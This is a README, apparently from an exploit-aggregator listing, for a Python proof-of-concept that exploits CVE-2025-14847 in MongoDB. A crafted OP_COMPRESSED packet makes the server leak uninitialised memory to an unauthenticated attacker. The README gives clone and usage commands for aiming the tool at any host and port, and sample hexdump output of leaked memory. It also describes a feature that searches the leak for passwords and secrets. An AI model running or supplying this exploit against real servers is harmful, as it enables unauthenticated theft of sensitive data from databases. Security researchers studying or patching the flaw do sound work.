## https://sploitus.com/exploit?id=03B41327-D2A1-5F6C-A672-35EB0BD49A05
# CVE-2025-14847 – MongoDB Unauthenticated Memory‑Leak Exploit
## Overview
A proof‑of‑concept (PoC) exploit for the MongoDB *zlib decompression* vulnerability that allows unauthenticated attackers to read sensitive server memory.
The PoC is implemented in Python 3 and demonstrates how a malicious `OP_COMPRESSED` packet can trigger the bug, causing MongoDB to return uninitialized memory as BSON data.
---
## What the Exploit Does
The vulnerability is caused by a flaw in MongoDB’s zlib message decompression:
1. **A compressed message with an inflated `uncompressedSize` claim is sent.**
2. **MongoDB allocates a large buffer** based on that inflated value.
3. **zlib decompresses the actual data into the start of that buffer.**
4. **MongoDB treats the entire buffer as valid data,** leading to reading of *uninitialized* memory.
5. **BSON parsing then reads “field names”** from that memory until a null byte is hit, exposing hidden data.
The PoC sends a crafted `OP_COMPRESSED` packet and parses the server’s error response to recover leaked data fragments.
---
## Prerequisites
| Component | Version | Notes |
|-----------|---------|-------|
| Python | ≥ 3.8 | The script is Python‑3 only |
| MongoDB | ≥ 4.4 | Target must be vulnerable to CVE‑2025‑14847 |
| Optional | `requirements.txt` | Provided in the repo |
---
## Installation
```bash
# Clone the repo (or copy the script)
git clone https://github.com/lincemorado97/CVE-2025-14847.git
cd cve-2025-14847
# (Optional) Install required Python packages
pip install -r requirements.txt
```
---
## Usage
```bash
python exploit.py [OPTIONS]
```
| Option | Default | Description |
|--------|---------|-------------|
| `--host` | `localhost` | Target MongoDB host |
| `--port` | `27017` | Target MongoDB port |
| `--min-offset` | `20` | Minimum document length to probe |
| `--max-offset` | `8192` | Maximum document length to probe |
| `--output` | `leaked.bin` | File where leaked data is saved |
**Example:**
```bash
python exploit.py --host 10.0.0.5 --port 27017 --min-offset 50 --max-offset 5000 --output leaks.bin
```
---
## Example
```bash
$ python3 exploit.py
11:02:41 CVE-2025-14847 INFO │ [*] Target: localhost:27017
11:02:41 CVE-2025-14847 INFO │ [*] Scanning offsets 20-8192
11:02:41 CVE-2025-14847 INFO │ Offset Hex ASCII
11:02:41 CVE-2025-14847 INFO │ ---------------------------------------------------------------------------
11:02:41 CVE-2025-14847 INFO │ 00000000: 20 6f 62 6a 65 63 74 20 77 69 74 68 20 75 6e 6b | object with unk|
11:02:41 CVE-2025-14847 INFO │ 00000010: 6e 6f 77 6e 20 5f 69 64 |nown _id|
11:02:41 CVE-2025-14847 INFO │ [+] offset= 39 len= 24:
11:02:45 CVE-2025-14847 INFO │ Offset Hex ASCII
11:02:45 CVE-2025-14847 INFO │ ---------------------------------------------------------------------------
11:02:45 CVE-2025-14847 INFO │ 00000000: 73 20 73 6b 69 70 70 65 64 20 64 75 72 69 6e 67 |s skipped during|
11:02:45 CVE-2025-14847 INFO │ 00000010: 20 74 72 65 65 20 77 61 6c 6b | tree walk|
11:02:45 CVE-2025-14847 INFO │ [+] offset=3064 len= 26:
11:02:50 CVE-2025-14847 INFO │ Offset Hex ASCII
....
11:02:50 CVE-2025-14847 INFO │ [+] offset=6663 len= 38:
11:02:52 CVE-2025-14847 SUCCESS │ [*] Total leaked: 496 bytes
11:02:52 CVE-2025-14847 SUCCESS │ [*] Unique fragments: 85
11:02:52 CVE-2025-14847 SUCCESS │ [*] Saved to: leaked.bin
```
The script will log each interesting fragment (length > 10 bytes) and output a hexdump view. All leaked data is appended to `leaked.bin`.

---
## Understanding the Output
- **Hexdump**: Shows a subset of the leaked data in both hex and ASCII.
- **Log lines**: `[+] offset= len= ` indicates where a fragment was found.
- **Total leaked**: Bytes written to the output file.
- **Unique fragments**: Distinct data blocks detected.
- **Secret detection**: The script prints any of the predefined patterns (`password`, `secret`, etc.) found in the leaked data.
## References
* CVE-2025-14847 – https://nvd.nist.gov/vuln/detail/CVE-2025-14847
* Analysis: https://www.ox.security/blog/attackers-could-exploit-zlib-to-exfiltrate-data-cve-2025-14847/
## Disclaimer
This PoC is provided "as is" without any warranty. The author is not responsible for any misuse or damage caused by this script. Use it at your own risk.